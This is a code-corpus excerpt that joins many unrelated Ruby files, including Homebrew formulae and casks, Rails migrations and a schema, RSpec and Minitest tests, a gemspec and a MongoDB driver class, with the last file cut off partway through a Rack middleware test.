# sha256 "39a042775bc8e7f84c18cf714080ca0b70768625f41dc085a6ceb1c116a2875e" => :mojave
sha256 "0fddb60bfc65a89bce2b7f9a0226e8f792302c29bd3c18684e28a943c13bd6af" => :high_sierra
sha256 "528b4c5cde0ef580ad4dc192b54588c9c5302f48d4ef84bf7c3063a2eb50761c" => :sierra
sha256 "2474d07db0d530e110500dbc7d64e7b43cbb527b9c0d42b439b551fe6779b3bf" => :el_capitan
end
def install
system "./configure"
# fio's CFLAGS passes vital stuff around, and crushing it will break the build
system "make", "prefix=#{prefix}",
"mandir=#{man}",
"sharedir=#{share}",
"CC=#{ENV.cc}",
"V=true", # get normal verbose output from fio's makefile
"install"
end
test do
system "#{bin}/fio", "--parse-only"
end
end
| 36.666667 | 93 | 0.689091 |
bfb0d3f5dc6dfc6f6d5b3af90c954d64c513571c | 1,202 | # frozen_string_literal: true
# encoding: utf-8
# Copyright (C) 2021 MongoDB Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Mongo
module Operation
class WriteCommand
# A MongoDB write command operation sent as an op message.
#
# @api private
class OpMsg < OpMsgBase
include Validatable
private
def selector(connection)
super.tap do |selector|
if selector.key?(:findAndModify)
validate_find_options(connection, selector)
end
if wc = spec[:write_concern]
selector[:writeConcern] = wc.options
end
end
end
end
end
end
end
| 27.318182 | 74 | 0.663894 |
26dfa66488bd9db1398b955293137f2331e8e480 | 142 | require 'mxx_ru/cpp'
MxxRu::Cpp::exe_target {
required_prj 'so_5/prj_s.rb'
target 'sample.so_5.coop_listener_s'
cpp_source 'main.cpp'
}
| 14.2 | 37 | 0.739437 |
21fed918e6f20ae2efb41755b51b059b1f39c555 | 686 | require 'active_support/inflector'
class Dessert
attr_reader :type, :quantity, :ingredients, :temp
def initialize(type, quantity, chef)
raise ArgumentError unless quantity.is_a?(Integer)
@type = type
@quantity = quantity
@chef = chef
@ingredients = []
@temp = 60
end
def add_ingredient(ingredient)
@ingredients << ingredient
end
def mix!
@ingredients.shuffle!
end
def heat!
@temp = 400
end
def eat(amount)
raise "not enough left!" if @quantity - amount < 0
@quantity -= amount
end
def serve
"#{@chef.titleize} has made #{@quantity} #{@type.pluralize}!"
end
def make_more
@chef.bake(self)
end
end
| 17.15 | 65 | 0.64723 |
ff5a1e892144aa00fc418f176aa6fc02ef0c620c | 410 | require 'gems'
module Gemmies
class AddWebhook < Services::Base
IGNORED_ERROR_MESSAGE = /has already been registered/
def call(gemmy)
return unless Gems.key.present?
begin
Gems.add_web_hook gemmy.name, api_releases_url
rescue Gems::GemError => error
unless IGNORED_ERROR_MESSAGE.match?(error.message)
raise error
end
end
end
end
end
| 20.5 | 58 | 0.663415 |
e8a7b9f82ef0882b92f140218ac631fd150b2cdc | 335 | if ENV['PROVISIONED_USERNAME'] == 'root'
PROVISIONED_DIRECTORY = '/root'
else
PROVISIONED_DIRECTORY = "/home/#{ENV['PROVISIONED_USERNAME']}"
end
remote_file "#{PROVISIONED_DIRECTORY}/.vimrc" do
source ENV['VIMRC_FILE']
content 'Copy Vim config file'
owner ENV['PROVISIONED_USERNAME']
group ENV['PROVISIONED_USERNAME']
end
| 25.769231 | 64 | 0.746269 |
6a5be4ae250487f0b658ae58159d3de137fb52e9 | 629 | [
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 50},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 7},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 10},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 5},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 2},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 4},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 24}
]
| 62.9 | 89 | 0.605723 |
f82d865cbf3126536a88b90efca8e10aa0ac6abb | 155 | class CreatePhotos < ActiveRecord::Migration[5.2]
def change
create_table :photos do |t|
t.string :image
t.timestamps
end
end
end
| 15.5 | 49 | 0.658065 |
bf2accea0985af82c4595a3bd06fdf85dc194fad | 808 | class PessoaPolicy < ApplicationPolicy
def index?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def show?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def new?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def edit?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def create?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def update?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def destroy?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
class Scope < Scope
def resolve
scope
end
end
end
| 21.837838 | 79 | 0.662129 |
2665df2440ace00f0074c3a70614915eb03f44d6 | 218 | # Copyright (c) 2019 Danil Pismenny <[email protected]>
# frozen_string_literal: true
# Load the Rails application.
require_relative 'application'
# Initialize the Rails application.
Rails.application.initialize!
| 21.8 | 57 | 0.798165 |
4a19981466959cae1052c27933dff46c7f662c2b | 675 | cask 'duet' do
version '2.1.0.8'
sha256 '7193d0753f03993f8c7250e4c868aea9c7f54265514aae864a5798b1f07588ae'
# duet.nyc3.cdn.digitaloceanspaces.com/Mac was verified as official when first introduced to the cask
url "https://duet.nyc3.cdn.digitaloceanspaces.com/Mac/#{version.major_minor.dots_to_underscores}/duet-#{version.dots_to_hyphens}.zip"
appcast 'https://macupdater.net/cgi-bin/check_urls/check_url_redirect.cgi?url=https://updates.duetdisplay.com/latestMac',
configuration: version.dots_to_hyphens
name 'Duet'
homepage 'https://www.duetdisplay.com/'
auto_updates true
app 'duet.app'
uninstall kext: 'com.karios.driver.DuetDisplay'
end
| 37.5 | 135 | 0.777778 |
01dff358973f66343f8d7d0bdb4d60f6105f637a | 1,848 | require 'spec_helper'
describe Spree::PromotionCodeBatchJob, type: :job do
let(:email) { "[email protected]" }
let(:promotion_code_batch) do
Spree::PromotionCodeBatch.create!(
promotion_id: create(:promotion).id,
base_code: "test",
number_of_codes: 10,
email: email
)
end
context "with a successful build" do
before do
allow(Spree::PromotionCodeBatchMailer)
.to receive(:promotion_code_batch_finished)
.and_call_original
end
context "with an email address" do
it "sends an email" do
subject.perform(promotion_code_batch)
expect(Spree::PromotionCodeBatchMailer)
.to have_received(:promotion_code_batch_finished)
end
end
context "with no email address" do
let(:email) { nil }
it "sends an email" do
subject.perform(promotion_code_batch)
expect(Spree::PromotionCodeBatchMailer)
.to_not have_received(:promotion_code_batch_finished)
end
end
end
context "with a failed build" do
before do
allow_any_instance_of(Spree::PromotionCode::BatchBuilder)
.to receive(:build_promotion_codes)
.and_raise("Error")
allow(Spree::PromotionCodeBatchMailer)
.to receive(:promotion_code_batch_errored)
.and_call_original
expect { subject.perform(promotion_code_batch) }
.to raise_error RuntimeError
end
context "with an email address" do
it "sends an email" do
expect(Spree::PromotionCodeBatchMailer)
.to have_received(:promotion_code_batch_errored)
end
end
context "with no email address" do
let(:email) { nil }
it "sends an email" do
expect(Spree::PromotionCodeBatchMailer)
.to_not have_received(:promotion_code_batch_errored)
end
end
end
end
| 28 | 63 | 0.669372 |
1aa11be3639c5909826a78c794895323e24b6dc0 | 50 | module RoadieActionmailer
VERSION = "0.0.1"
end
| 12.5 | 25 | 0.74 |
d585bfe42803d70a4c547daac0f2526319a0614d | 1,471 | cask "microsoft-edge" do
folder = Hardware::CPU.intel? ? "C1297A47-86C4-4C1F-97FA-950631F94777" : "03adf619-38c6-4249-95ff-4a01c0ffc962"
linkid = Hardware::CPU.intel? ? "2069148" : "2093504"
version "96.0.1054.43"
if Hardware::CPU.intel?
sha256 "cf229328305f25c91fd1909014f4a50df49a86d968965712ea5d28fad2a504ea"
else
sha256 "307ebca065bd9a4420b0100435e59df0d6dd192c89ec4c166173cf190337a124"
end
url "https://officecdn-microsoft-com.akamaized.net/pr/#{folder}/MacAutoupdate/MicrosoftEdge-#{version}.pkg",
verified: "officecdn-microsoft-com.akamaized.net/"
name "Microsoft Edge"
desc "Web browser"
homepage "https://www.microsoft.com/edge"
livecheck do
url "https://go.microsoft.com/fwlink/?linkid=#{linkid}"
strategy :header_match
end
auto_updates true
depends_on cask: "microsoft-auto-update"
pkg "MicrosoftEdge-#{version}.pkg",
choices: [
{
"choiceIdentifier" => "com.microsoft.package.Microsoft_AutoUpdate.app", # Office16_all_autoupdate.pkg
"choiceAttribute" => "selected",
"attributeSetting" => 0,
},
]
uninstall pkgutil: "com.microsoft.edgemac"
zap trash: [
"~/Library/Application Support/Microsoft Edge",
"~/Library/Caches/Microsoft Edge",
"~/Library/Preferences/com.microsoft.edgemac.plist",
"~/Library/Saved Application State/com.microsoft.edgemac.savedState",
],
rmdir: "/Library/Application Support/Microsoft"
end
| 31.978261 | 113 | 0.706322 |
d51db3e446227dd395d686013160f9ca1e13a403 | 1,099 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'll_pay/version'
Gem::Specification.new do |spec|
spec.name = 'll_pay'
spec.version = LlPay::VERSION
spec.authors = ['houdelin']
spec.email = ['[email protected]']
  spec.summary       = 'An unofficial lianlian pay (for Apple Pay) gem.'
  spec.description   = 'Helps rubyists integrate with lianlian pay (lianlianpay, llpay) more easily.'
spec.homepage = 'https://github.com/bayetech/ll_pay'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(spec|features)/}) } \
- %w(CODE_OF_CONDUCT.md ll-pay.sublime-project Gemfile Rakefile ll_pay.gemspec bin/setup bin/console)
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_runtime_dependency 'http', '>= 1.0.4', '< 5'
spec.add_development_dependency 'rake', '~> 11.3'
spec.add_development_dependency 'rspec', '~> 3.5'
end
| 40.703704 | 105 | 0.652411 |
b9a32a5f7ab41c81f9ebf057dc16e461eb3857fb | 36 | module PsiDisciplineSlotsHelper
end
| 12 | 31 | 0.916667 |
017791f197c052fffb4db284ef67f49cb8a684df | 338 | # frozen_string_literal: true
module Gitlab
module BackgroundMigration
# No op on CE
class MigrateRequirementsToWorkItems
def perform(start_id, end_id)
end
end
end
end
Gitlab::BackgroundMigration::MigrateRequirementsToWorkItems.prepend_mod_with('Gitlab::BackgroundMigration::MigrateRequirementsToWorkItems')
| 24.142857 | 139 | 0.789941 |
39976194fe0e0aac5417abc50ca9ea6a6b86eef1 | 3,296 | namespace :db do
desc "Download latest project list and import csv"
task :update => :environment do
require 'csv'
require 'open-uri'
require 'open_uri_redirections'
puts "Starting import..."
record_count = 0
filename = "http://infrastructure.gc.ca/alt-format/opendata/project-list-liste-de-projets-bil.csv"
CSV.parse(open(filename, 'r:iso-8859-1:utf-8', :allow_redirections => :all){|f| f.read}, headers: true, header_converters: :symbol) do |row|
project_number = row[0]
project_title_en = row[1]
project_title_fr = row[2]
program_title_en = row[5]
program_title_fr = row[6]
category_en = row[7]
category_fr = row[8]
location_en = row[9]
location_fr = row[10]
region = row[11]
approved_date = row[12]
construction_start_date = row[13]
construction_end_date = row[14]
federal_contribution = row[15]
total_eligible_cost = row[16]
ultimate_recipient_en = row[17]
ultimate_recipient_fr = row[18]
forecasted_construction_start_date = row[19]
forecasted_construction_end_date = row[20]
program = Program.find_or_create_by(title_en:program_title_en)
program.title_en = program_title_en
program.title_fr = program_title_fr
program.save!
program_id = Program.find_by(title_en:program_title_en).id
category = Category.find_or_create_by(title_en:category_en)
category.title_en = category_en
category.title_fr = category_fr
category.save!
category_id = Category.find_by(title_en:category_en).id
region_code = Region.find_or_create_by(code:region)
region_code.save!
region_id = Region.find_by(code:region).id
location = Location.find_or_create_by(name_en:location_en, region_id: region_id)
location.name_fr = location_fr
location.save!
location_id = Location.find_by(name_en:location_en, region_id: region_id).id
project = Project.find_or_create_by(number:project_number)
project.title_en = project_title_en
project.title_fr = project_title_fr
project.federal_contribution = federal_contribution
project.total_eligible_cost = total_eligible_cost
project.ultimate_recipient_en = ultimate_recipient_en
project.ultimate_recipient_fr = ultimate_recipient_fr
project.forecasted_construction_start_date = forecasted_construction_start_date
project.forecasted_construction_end_date = forecasted_construction_end_date
project.approved_date = approved_date
project.construction_start_date = construction_start_date
project.construction_end_date = construction_end_date
project.program_id = program_id
project.category_id = category_id
project.location_id = location_id
project.region_id = region_id
project.save!
record_count = record_count + 1
print "#{record_count} project records imported \r"
end
puts "-- "
puts "#{record_count} project records imported"
puts "#{Time.now.strftime("%Y-%m-%d_%H-%M")}"
puts "-- "
update = Update.create(record_count:record_count)
end
end | 34.333333 | 144 | 0.684163 |
6a3db1da30296f4c06a5603f0243e28a26ac3ee6 | 1,905 | require 'spec/preparation'
describe 'A Diakonos::Clipboard' do
it 'can accept new clips via #add_clip' do
c = Diakonos::Clipboard.new( 3 )
c.add_clip( nil ).should.be.false
c.add_clip( [ 'foo' ] ).should.be.true
c.add_clip( [ 'bar' ] ).should.be.true
c.add_clip( [ 'baz' ] ).should.be.true
c[ 2 ].should.equal [ 'foo' ]
c[ 3 ].should.be.nil
c.add_clip( [ 'fiz' ] ).should.be.true
c[ 2 ].should.equal [ 'bar' ]
c[ 3 ].should.be.nil
end
it 'provides access to clips via #[]' do
c = Diakonos::Clipboard.new( 3 )
c[ -1 ].should.be.nil
c[ 0 ].should.be.nil
c[ 1 ].should.be.nil
c.add_clip( nil ).should.be.false
x = [ 'foo' ]
c.add_clip( x ).should.be.true
c[ -1 ].should.equal x
c[ 0 ].should.equal x
c[ 1 ].should.be.nil
end
it 'can be iterated over via #each' do
c = Diakonos::Clipboard.new( 10 )
9.downto( 0 ) do |i|
c.add_clip( [ i.to_s ] )
end
i = 0
c.each do |clip|
clip.should.equal [ i.to_s ]
i += 1
end
end
it 'provides #append_to_clip to append to clips' do
c = Diakonos::Clipboard.new( 10 )
c.append_to_clip( nil ).should.be.false
x = [ 'foo' ]
c.append_to_clip( x ).should.be.true
c.clip.should.equal [ 'foo' ]
c.append_to_clip( [ 'bar', 'baz' ] ).should.be.true
c.clip.should.equal [ 'foo', 'bar', 'baz' ]
y = [ 'line with newline', '' ]
c.add_clip( y ).should.be.true
c.clip.should.equal y
c.append_to_clip( [ 'another line' ] ).should.be.true
c.clip.should.equal [ 'line with newline', 'another line' ]
c.add_clip( [ 'line1', '' ] ).should.be.true
c.clip.should.equal [ 'line1', '' ]
c.append_to_clip( [ '', '' ] ).should.be.true
c.clip.should.equal [ 'line1', '', '' ]
c.append_to_clip( [ 'line2', '' ] ).should.be.true
c.clip.should.equal [ 'line1', '', 'line2', '' ]
end
end | 29.307692 | 63 | 0.571129 |
263d562b7eb014629817f36df9e66dcced2dd7b5 | 2,621 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20170330042636) do
create_table "db_people", force: :cascade do |t|
t.string "label"
t.integer "age"
t.integer "height"
t.string "hair_color"
t.string "eye_color"
t.boolean "alive"
t.float "weight"
t.float "mass"
t.string "gender"
t.text "description"
t.string "people_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "db_places", force: :cascade do |t|
t.string "label"
t.float "latitude"
t.float "longitude"
t.string "zip_code"
t.string "street_number"
t.string "street"
t.float "area"
t.boolean "earth"
t.boolean "space"
t.string "country"
t.string "state"
t.integer "north"
t.integer "south"
t.integer "east"
t.integer "west"
t.integer "up"
t.integer "down"
t.text "description"
t.string "place_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "db_sessions", force: :cascade do |t|
t.string "sessionId"
t.string "userId"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "db_things", force: :cascade do |t|
t.string "label"
t.float "mass"
t.boolean "edible"
t.boolean "visible"
t.boolean "wearable"
t.boolean "container"
t.boolean "containable"
t.boolean "transportable"
t.boolean "transport"
t.boolean "platform"
t.boolean "platformable"
t.boolean "damageable"
t.boolean "damager"
t.integer "cost"
t.boolean "takeable"
t.boolean "dropable"
t.text "description"
t.string "thing_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 30.476744 | 86 | 0.659672 |
1cf08afce7ed3e8592845169eacaf9b3a7e8c3be | 5,430 | class Libbi < Formula
desc "Bayesian state-space modelling on parallel computer hardware"
homepage "https://libbi.org/"
url "https://github.com/libbi/LibBi/archive/1.4.2.tar.gz"
sha256 "17824f6b466777a02d6bc6bb4704749fb64ce56ec4468b936086bc9901b5bf78"
revision 1
head "https://github.com/libbi/LibBi.git"
bottle do
cellar :any_skip_relocation
# sha256 "eac0034e849157b555d5874f995135178dd1da353f0a713572f59d16d72c16af" => :mojave
sha256 "c9188f7283ff75930ce98c042df60151daf553d904f18bceb5c042c702c86978" => :high_sierra
sha256 "2f519a8e7b1b62fb5f6d29d7cee26788891ca658af8aff33f963e75a9c0a59f0" => :sierra
sha256 "32b7b3f955ce2aff321b2ba6ba43e03e11102bb799b7e73c400c2fe3513547bf" => :el_capitan
end
depends_on "automake"
depends_on "boost"
depends_on "gsl"
depends_on "netcdf"
depends_on "qrupdate"
resource "Test::Simple" do
url "https://cpan.metacpan.org/authors/id/E/EX/EXODIST/Test-Simple-1.302133.tar.gz"
sha256 "02bc2b4ec299886efcc29148308c9afb64e0f2c2acdeaa2dee33c3adfe6f96e2"
end
resource "Getopt::ArgvFile" do
url "https://cpan.metacpan.org/authors/id/J/JS/JSTENZEL/Getopt-ArgvFile-1.11.tar.gz"
sha256 "3709aa513ce6fd71d1a55a02e34d2f090017d5350a9bd447005653c9b0835b22"
end
resource "Carp::Assert" do
url "https://cpan.metacpan.org/authors/id/N/NE/NEILB/Carp-Assert-0.21.tar.gz"
sha256 "924f8e2b4e3cb3d8b26246b5f9c07cdaa4b8800cef345fa0811d72930d73a54e"
end
resource "File::Slurp" do
url "https://cpan.metacpan.org/authors/id/U/UR/URI/File-Slurp-9999.19.tar.gz"
sha256 "ce29ebe995097ebd6e9bc03284714cdfa0c46dc94f6b14a56980747ea3253643"
end
resource "Parse::Yapp" do
url "https://cpan.metacpan.org/authors/id/W/WB/WBRASWELL/Parse-Yapp-1.21.tar.gz"
sha256 "3810e998308fba2e0f4f26043035032b027ce51ce5c8a52a8b8e340ca65f13e5"
end
resource "Parse::Template" do
url "https://cpan.metacpan.org/authors/id/P/PS/PSCUST/ParseTemplate-3.08.tar.gz"
sha256 "3c7734f53999de8351a77cb09631d7a4a0482b6f54bca63d69d5a4eec8686d51"
end
resource "Parse::Lex" do
url "https://cpan.metacpan.org/authors/id/P/PS/PSCUST/ParseLex-2.21.tar.gz"
sha256 "f55f0a7d1e2a6b806a47840c81c16d505c5c76765cb156e5f5fd703159a4492d"
end
resource "Parse::RecDescent" do
url "https://cpan.metacpan.org/authors/id/J/JT/JTBRAUN/Parse-RecDescent-1.967015.tar.gz"
sha256 "1943336a4cb54f1788a733f0827c0c55db4310d5eae15e542639c9dd85656e37"
end
resource "Math::Symbolic" do
url "https://cpan.metacpan.org/authors/id/S/SM/SMUELLER/Math-Symbolic-0.612.tar.gz"
sha256 "a9af979956c4c28683c535b5e5da3cde198c0cac2a11b3c9a129da218b3b9c08"
end
resource "YAML::Tiny" do
url "https://cpan.metacpan.org/authors/id/E/ET/ETHER/YAML-Tiny-1.73.tar.gz"
sha256 "bc315fa12e8f1e3ee5e2f430d90b708a5dc7e47c867dba8dce3a6b8fbe257744"
end
resource "File::Remove" do
url "https://cpan.metacpan.org/authors/id/S/SH/SHLOMIF/File-Remove-1.57.tar.gz"
sha256 "b3becd60165c38786d18285f770b8b06ebffe91797d8c00cc4730614382501ad"
end
resource "inc::Module::Install::DSL" do
url "https://cpan.metacpan.org/authors/id/E/ET/ETHER/Module-Install-1.19.tar.gz"
sha256 "1a53a78ddf3ab9e3c03fc5e354b436319a944cba4281baf0b904fa932a13011b"
end
resource "Class::Inspector" do
url "https://cpan.metacpan.org/authors/id/P/PL/PLICEASE/Class-Inspector-1.32.tar.gz"
sha256 "cefadc8b5338e43e570bc43f583e7c98d535c17b196bcf9084bb41d561cc0535"
end
resource "File::ShareDir" do
url "https://cpan.metacpan.org/authors/id/R/RE/REHSACK/File-ShareDir-1.104.tar.gz"
sha256 "07b628efcdf902d6a32e6a8e084497e8593d125c03ad12ef5cc03c87c7841caf"
end
resource "Template" do
url "https://cpan.metacpan.org/authors/id/A/AB/ABW/Template-Toolkit-2.27.tar.gz"
sha256 "1311a403264d0134c585af0309ff2a9d5074b8ece23ece5660d31ec96bf2c6dc"
end
resource "Graph" do
url "https://cpan.metacpan.org/authors/id/J/JH/JHI/Graph-0.9704.tar.gz"
sha256 "325e8eb07be2d09a909e450c13d3a42dcb2a2e96cc3ac780fe4572a0d80b2a25"
end
resource "thrust" do
url "https://github.com/thrust/thrust/releases/download/1.8.2/thrust-1.8.2.zip"
sha256 "00925daee4d9505b7f33d0ed42ab0de0f9c68c4ffbe2a41e6d04452cdee77b2d"
end
def install
ENV.prepend_create_path "PERL5LIB", libexec/"lib/perl5"
resources.each do |r|
r.stage do
next if r.name == "thrust"
# need to set TT_ACCEPT=y for Template library for non-interactive install
perl_flags = "TT_ACCEPT=y" if r.name == "Template"
system "perl", "Makefile.PL", "INSTALL_BASE=#{libexec}", perl_flags
system "make"
system "make", "install"
end
end
(include/"thrust").install resource("thrust")
system "perl", "Makefile.PL", "INSTALL_BASE=#{libexec}", "INSTALLSITESCRIPT=#{bin}"
# Disable dynamic selection of perl which may cause segfault when an
# incompatible perl is picked up.
# See, e.g., https://github.com/Homebrew/homebrew-core/issues/4936
inreplace "script/libbi", "#!/usr/bin/env perl", "#!/usr/bin/perl"
system "make"
system "make", "install"
pkgshare.install "Test.bi", "test.conf"
bin.env_script_all_files(libexec+"bin", :PERL5LIB => ENV["PERL5LIB"])
end
test do
cp Dir[pkgshare/"Test.bi", pkgshare/"test.conf"], testpath
system "#{bin}/libbi", "sample", "@test.conf"
assert_predicate testpath/"test.nc", :exist?
end
end
| 37.708333 | 93 | 0.750645 |
91ab0fa1f4b6467496da55bb18837f34c8ac5d63 | 1,068 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
Message.destroy_all
Chat.destroy_all
ChatApp.destroy_all
5.times do
chat_app = ChatApp.create!(name: Faker::TvShows::SiliconValley.app, token: SecureRandom.uuid)
3.times do |_i|
chat_number = Redix.connection.incr "chat_apps.#{chat_app.token}.chats.number"
chat = Chat.create!(chat_app_id: chat_app.id, name: Faker::TvShows::SiliconValley.invention, number: chat_number)
4.times do |_j|
message_number = Redix.connection.incr "chat_apps.#{chat_app.token}.chats.#{chat.number}.messages.number"
Message.create!(chat_id: chat.id, body: Faker::TvShows::RickAndMorty.quote, number: message_number)
end
end
end
Message.__elasticsearch__.create_index!
Message.import
| 38.142857 | 117 | 0.741573 |
b9ef26ec74fc11db08d0a4016a6fa2c7774ec379 | 377 | # encoding: UTF-8
# This file contains data derived from the IANA Time Zone Database
# (http://www.iana.org/time-zones).
module TZInfo
module Data
module Definitions
module America
module St_Kitts
include TimezoneDefinition
linked_timezone 'America/St_Kitts', 'America/Port_of_Spain'
end
end
end
end
end
| 19.842105 | 69 | 0.649867 |
aba65e57865ae7972b20583ecbbba98fb5749ed8 | 1,627 | class Libomp < Formula
desc "LLVM's OpenMP runtime library"
homepage "https://openmp.llvm.org/"
url "https://releases.llvm.org/8.0.0/openmp-8.0.0.src.tar.xz"
sha256 "f7b1705d2f16c4fc23d6531f67d2dd6fb78a077dd346b02fed64f4b8df65c9d5"
bottle do
cellar :any
sha256 "6c8f66a6582efa00620593e16a41f3649018778a300cc772afbe79c711c2c396" => :mojave
sha256 "4cc6fd69f1558f29165608c3e52aed88be6c56e3b0da10c9f6912ea3345daf3a" => :high_sierra
sha256 "e5d63a6b2cfeb05ded546b5f8d381acc592a2a37767cbae20569981229c66ac8" => :sierra
end
depends_on "cmake" => :build
depends_on :macos => :yosemite
def install
# Disable LIBOMP_INSTALL_ALIASES, otherwise the library is installed as
# libgomp alias which can conflict with GCC's libgomp.
system "cmake", ".", *std_cmake_args, "-DLIBOMP_INSTALL_ALIASES=OFF"
system "make", "install"
system "cmake", ".", "-DLIBOMP_ENABLE_SHARED=OFF", *std_cmake_args,
"-DLIBOMP_INSTALL_ALIASES=OFF"
system "make", "install"
end
test do
(testpath/"test.cpp").write <<~EOS
#include <omp.h>
#include <array>
int main (int argc, char** argv) {
std::array<size_t,2> arr = {0,0};
#pragma omp parallel num_threads(2)
{
size_t tid = omp_get_thread_num();
arr.at(tid) = tid + 1;
}
if(arr.at(0) == 1 && arr.at(1) == 2)
return 0;
else
return 1;
}
EOS
system ENV.cxx, "-Werror", "-Xpreprocessor", "-fopenmp", "test.cpp",
"-L#{lib}", "-lomp", "-o", "test"
system "./test"
end
end
| 33.204082 | 93 | 0.634296 |
d56eea80489bc97192a6d1ad6bdfc8030f7c760c | 2,916 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe ActiveJob::Retry::ConstantBackoffStrategy do
let(:strategy) { described_class.new(options) }
describe '#should_retry?' do
subject { strategy.should_retry?(attempt, exception) }
let(:attempt) { 1 }
let(:exception) { RuntimeError.new }
context 'when the limit is infinite' do
let(:options) { { limit: nil, unlimited_retries: true } }
context '1st attempt' do
let(:attempt) { 1 }
it { is_expected.to be(true) }
end
context '99999th attempt' do
let(:attempt) { 99_999 }
it { is_expected.to be(true) }
end
end
context 'when the limit is 0' do
let(:options) { { limit: 0 } }
context '1st attempt' do
let(:attempt) { 1 }
it { is_expected.to be(false) }
end
context '99999th attempt' do
let(:attempt) { 99_999 }
it { is_expected.to be(false) }
end
end
context 'when the limit is 5' do
let(:options) { { limit: 5 } }
context '1st attempt' do
let(:attempt) { 1 }
it { is_expected.to be(true) }
end
context '4th attempt' do
let(:attempt) { 4 }
it { is_expected.to be(true) }
end
context '5th attempt' do
let(:attempt) { 5 }
it { is_expected.to be(false) }
end
end
context 'defaults (retry everything)' do
let(:options) { { limit: 10 } }
context 'Exception' do
let(:exception) { Exception.new }
it { is_expected.to be(true) }
end
context 'RuntimeError' do
let(:exception) { RuntimeError.new }
it { is_expected.to be(true) }
end
context 'subclass of RuntimeError' do
let(:exception) { Class.new(RuntimeError).new }
it { is_expected.to be(true) }
end
end
context 'with whitelist' do
let(:options) { { limit: 10, retryable_exceptions: [RuntimeError] } }
context 'Exception' do
let(:exception) { Exception.new }
it { is_expected.to be(false) }
end
context 'RuntimeError' do
let(:exception) { RuntimeError.new }
it { is_expected.to be(true) }
end
context 'subclass of RuntimeError' do
let(:exception) { Class.new(RuntimeError).new }
it { is_expected.to be(true) }
end
end
context 'with blacklist' do
let(:options) { { limit: 10, fatal_exceptions: [RuntimeError] } }
context 'Exception' do
let(:exception) { Exception.new }
it { is_expected.to be(true) }
end
context 'RuntimeError' do
let(:exception) { RuntimeError.new }
it { is_expected.to be(false) }
end
context 'subclass of RuntimeError' do
let(:exception) { Class.new(RuntimeError).new }
it { is_expected.to be(false) }
end
end
end
end
| 24.711864 | 75 | 0.576475 |
b959e34acf7c1919c38f8ad979df98d5871eca0c | 811 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'flutter_qr_reader'
s.version = '0.0.1'
s.summary = 'QR code (scan code / picture) recognition (AndroidView/UiKitView)'
s.description = <<-DESC
QR code (scan code / picture) recognition (AndroidView/UiKitView)
DESC
s.homepage = 'http://example.com'
s.license = { :file => '../LICENSE' }
s.author = { 'Your Company' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.dependency 'LBXScan'
s.dependency 'LBXZBarSDK'
s.ios.deployment_target = '8.0'
end
| 35.26087 | 100 | 0.583231 |
03db3f276476a661a90a515ac1fe49a1ba957da6 | 3,911 | require 'helper'
require 'time'
require 'net/http'
require 'ddtrace'
require 'ddtrace/contrib/rack/middlewares'
require 'rack/test'
def wait_http_server(server, delay)
delay.times do |i|
uri = URI(server + '/')
begin
res = Net::HTTP.get_response(uri)
return true if res.code == '200'
rescue StandardError => e
puts e if i >= 3 # display errors only when failing repeatedly
end
sleep 1
end
false
end
class RackBaseTest < Minitest::Test
include Rack::Test::Methods
# rubocop:disable Metrics/MethodLength
def app
tracer = @tracer
Rack::Builder.new do
use Datadog::Contrib::Rack::TraceMiddleware
map '/success/' do
run(proc { |_env| [200, { 'Content-Type' => 'text/html' }, 'OK'] })
end
map '/failure/' do
run(proc { |_env| [400, { 'Content-Type' => 'text/html' }, 'KO'] })
end
map '/exception/' do
run(proc { |_env| raise StandardError, 'Unable to process the request' })
end
map '/500/' do
